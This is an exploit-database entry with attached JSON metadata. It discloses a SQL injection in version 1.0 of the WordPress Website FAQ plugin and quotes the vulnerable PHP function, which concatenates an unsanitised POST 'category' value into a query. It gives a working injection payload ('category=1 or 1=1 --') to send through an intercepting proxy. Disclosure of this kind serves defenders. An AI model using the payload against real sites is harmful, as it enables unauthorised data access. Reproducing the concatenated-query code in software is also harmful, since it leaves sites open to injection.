ID 1337DAY-ID-18825 Type zdt Reporter Chris Kellum Modified 2012-06-26T00:00:00
Description
Exploit for php platform in category web applications
# Exploit Title: WordPress Website FAQ Plugin v1.0 SQL Injection
# Date: 6/25/12
# Exploit Author: Chris Kellum
# Vendor Homepage: http://wordpress.org/extend/plugins/website-faq/
# Software Link: http://downloads.wordpress.org/plugin/website-faq.zip
# Version: 1.0
==============================================================================
Vulnerability location: /wp-content/plugins/website-faq/website-faq-widget.php
==============================================================================
Lines 106-115:
function displayAnswer()
{
global $wpdb;
$master_table = $wpdb->prefix . "faq";
$category = $_POST['category'];
$searchtxt = $_POST['searchtxt'];
if($category!=0)
{
$sql = "SELECT * FROM $master_table WHERE faq_category=".$category." AND faq_question LIKE '%".$searchtxt."%'";
}
===============================================================
Vulnerability Details: faq_category vulnerable to SQL injection
===============================================================
When submitting a query via the widget, intercept the post request via burp or other proxy to find the following:
action=displayAnswer&category=1&searchtxt=[your query]
Changing category=1 to category=1 or 1=1 -- exposes the vulnerability, as it returns all FAQ results regardless of searchtxt value.
# 0day.today [2018-02-16] #
{"id": "1337DAY-ID-18825", "lastseen": "2018-02-16T03:22:10", "viewCount": 6, "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 0.4, "vector": "NONE", "modified": "2018-02-16T03:22:10", "rev": 2}, "dependencies": {"references": [{"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/NOVELL/ZENWORKS_PREBOOT_OP6C_BOF", "MSF:EXPLOIT/WINDOWS/BROWSER/CISCO_PLAYERPT_SETSOURCE", "MSF:AUXILIARY/SCANNER/HTTP/MANAGEENGINE_DEVICEEXPERT_TRAVERSAL", "MSF:EXPLOIT/UNIX/MISC/XEROX_MFP", "MSF:EXPLOIT/WINDOWS/BROWSER/VLC_MMS_BOF"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:8547", "SECURITYVULNS:DOC:18825"]}], "modified": "2018-02-16T03:22:10", "rev": 2}, "vulnersScore": 0.4}, "type": "zdt", "sourceHref": "https://0day.today/exploit/18825", "description": "Exploit for php platform in category web applications", "title": "WordPress Website FAQ Plugin v1.0 SQL Injection", "cvelist": [], "sourceData": "# Exploit Title: WordPress Website FAQ Plugin v1.0 SQL Injection\r\n# Date: 6/25/12\r\n# Exploit Author: Chris Kellum\r\n# Vendor Homepage: http://wordpress.org/extend/plugins/website-faq/\r\n# Software Link: http://downloads.wordpress.org/plugin/website-faq.zip\r\n# Version: 1.0\r\n \r\n \r\n==============================================================================\r\nVulnerability location: /wp-content/plugins/website-faq/website-faq-widget.php\r\n==============================================================================\r\n \r\n Lines 106-115:\r\n \r\n function displayAnswer()\r\n {\r\n global $wpdb;\r\n $master_table = $wpdb->prefix . \"faq\";\r\n $category = $_POST['category'];\r\n $searchtxt = $_POST['searchtxt'];\r\n if($category!=0)\r\n {\r\n $sql = \"SELECT * FROM $master_table WHERE faq_category=\".$category.\" AND faq_question LIKE '%\".$searchtxt.\"%'\";\r\n }\r\n \r\n===============================================================\r\nVulnerability Details: faq_category vulnerable to SQL injection\r\n===============================================================\r\n \r\nWhen submitting a query via the widget, intercept the post request via burp or other proxy to find the following:\r\n \r\n action=displayAnswer&category=1&searchtxt=[your query]\r\n \r\nChanging category=1 to category=1 or 1=1 -- exposes the vulnerability, as it returns all FAQ results regardless of searchtxt value.\r\n\r\n\n\n# 0day.today [2018-02-16] #", "published": "2012-06-26T00:00:00", "references": [], "reporter": "Chris Kellum", "modified": "2012-06-26T00:00:00", "href": "https://0day.today/exploit/description/18825"}
